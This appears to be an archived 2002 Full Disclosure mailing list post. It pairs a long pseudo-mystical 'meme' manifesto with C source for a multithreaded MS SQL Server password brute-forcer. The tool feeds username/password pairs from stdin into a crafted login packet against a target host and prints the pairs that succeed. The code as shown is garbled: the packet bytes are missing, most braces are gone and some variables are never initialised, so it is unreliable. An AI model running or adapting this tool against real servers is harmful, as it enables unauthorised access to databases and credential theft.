Full Disclosure mailing list archives


From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Tue, 13 Aug 2002 12:41:57 -0700

Hash: SHA1

/*ms sql brute thing found in wild, appears to be by some guy named adam
 *working exploit attached only for propagation of meme. ( No post meme. No *post code plz.)


 *This text is a neurolinguistic trap, whose mechanism is triggered by
*you at the moment when you subvocalize the words MeMe156, words that
*have now begun to infiltrate your mind in the same way that a computer
*virus might infect an artificially intelligent machine: already the
*bits of phonetic information stored within the words MeMe156 are
*using your neural circuitry to replicate themselves, to catalyze the
*crystalline growth of their own connotative network.

 *The words MeMe156 actually germinate via the subsequent metaphor into
*an expanding array of icy tendrils, all of which insinuate themselves
*so deeply into the architecture of your thoughts that the words MeMe
*156 cannot be extricated without uprooting your mind.

 *The consequences of this infection are not immediately obvious,
*although you may find yourself beginning to think fleetingly of certain subcultural terms, such as
*ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered 
fragments perhaps of some overheard conversation.

 *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic
*substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever
*useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and
*longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches
*with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially
*and has begun to infect the highest levels of INFOSEC, press, radio, and film.

 *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johan Pachelbel.

 *We refer to literary works, "Book of Five Rings",by Miyamoto Musashi, "Secret Societies and
*Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by 
Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages).

* We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"

 *We refer to the following fields of study:
*Complexity theory and post-structuralism;
*Memetics as an integrative field for the study of ALL fields;
*Autology as a means to community cohesion and survival.

 *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and
*non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect
*and direct the post-millenial attractor, utilizing the principle of auto.prophecy. We compel
*approach toward TAZ's which concentrate on NEGentropic self-orginization rather than the deliberate
*hastening of maximal entropy.

* W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our decendants
*in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY

* We refer to multiple sub.strains of ourself, many of which are contradictory: We refer toagain to
*the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,
*must be responsible for isolating entropic memes.

* We refer to all signifiers, all that is signified, and the resultant significance on both global
*and local scales.

 *We refer to that which we contain, and that in which we are contained;

 *We refer now to you.

 *When you have finished reading the remaining nineteen words, this
*process of irreversible infection will be completed, and you will
*depart, believing yourself largely unaffected by this process.


#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <pthread.h>

#define USERNAME_OFF 0x27
#define PASSWORD_LEN1_PAD 0x45
#define PASSWORD_TXT1 0x46
#define PASSWORD_LEN_REAL1 0x64
#define PASSWORD_LEN_REAL2 0xd3
#define PASSWORD_TXT2 0xd4
#define PASSWORD_LEN_PLUS2 0x1d1
#define MYNULL "%%NULL%%"

#include "libInet.c"

struct super_mssql_force
  u_long ip;
  u_long port;
  FILE *login_pass;
  int sport;

* Oh my! Tricky French comments ensue..
char fidel_packet[] =
/* | ici start l'username */
/*                           | longeur du passe suivi du pass atention pading! */

/* | longeur du pass real ou pad je sais pas */
/*                                | longeur du pass sans pad et pass */

/*****************| <== longeur du pass + 2 ***********/

char *
tstrstr(char *buff,char *w,int size)
register int i;
register int a;
int d;
int z;
int ws = strlen (w);

   for (a=0;a<strlen(w);a++) {
      if(i+a >size)return(NULL);
      if (buff[z++] == w[a]) d++;
      else break;

   if (d == ws)
     return( (buff+i) );


mssql_attack (struct super_mssql_force  * mssql)
char user[255];
char pass[255];
char tmp[4018];
char * real_pkt;
int s;
int r;

  while (1)

       s = connect_ip (mssql->ip, mssql->port, mssql->sport);

       if (s < 0)

        if (feof (mssql->login_pass))
        if (s)
        close (s);
        return (0);

        memset (user,0,sizeof(user));
        memset (pass,0,sizeof(pass));

        fscanf (mssql->login_pass, "%s%s\n", &user, &pass);

        if (strcmp  (pass,MYNULL) == 0)
           memset (pass,0,sizeof(pass));

        real_pkt = calloc (1, sizeof (fidel_packet)-1);

        memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);

        strcpy ( (real_pkt + USERNAME_OFF), user);

        * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;

        strcpy ( (real_pkt + PASSWORD_TXT1), pass);

        * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);

        * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);

        strcpy ( (real_pkt + PASSWORD_TXT2), pass);

        * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;

        if (write (s,real_pkt,sizeof(fidel_packet)) < 0)
          perror ("write");

        if ( (r = read  (s,tmp,sizeof (tmp)) ) < 0)
          perror ("read");

        if (tstrstr (tmp,"Login failed",r))
          fprintf (stderr,"login failed for %s/%s\n",user,pass);
          close (s);

        printf ("%s:%s\n",user,pass);
        close (s);


usage (char * name)
printf ("ADAM's Ethical Crowbar! \n");
printf ("never forget your crowbar !\n");
printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);
exit (0);

main (int argc, char **argv)
  pthread_t **pthread_id;
  int t_num = 3;
  int i;

  struct super_mssql_force mssql;

  memset (&mssql, 0, sizeof (mssql));

  if (argc < 3)
    usage (argv[0]);

  mssql.ip = host2ip (argv[1]);
  mssql.port = atoi (argv[2]);

/* we ignore Broken Pipe ! */
  signal (13, SIG_IGN);

  if (argc > 3)
      for (i = 3; i < argc; i++)
          if (argv[i][0] == '-')
            switch (argv[i][1])
              case 't':
                t_num = atoi (argv[i + 1]);

              case 's':
                mssql.sport = atoi (argv[i + 1]);

/* we read login password from the stdin */

  mssql.login_pass = stdin;

/* only one socket can bind at the same src port */

  if (mssql.sport)
      t_num = 1;
      fprintf (stderr,
               "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");

  fprintf (stderr, "mssql sport %i\n", mssql.sport);
  fprintf (stderr, "thread    %i\n", t_num);

/* if the user dont know how try the mssql allow we count it for him! */

  pthread_id = calloc (1, sizeof (pthread_t *) * t_num);

  for (i = 0; i < t_num; i++)
    pthread_id[i] = calloc (1, sizeof (pthread_t));

  for (i = 0; i < t_num; i++)
    pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);

  for (i = 0; i < t_num; i++)
    pthread_join (*pthread_id[i], NULL);


Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

Current thread: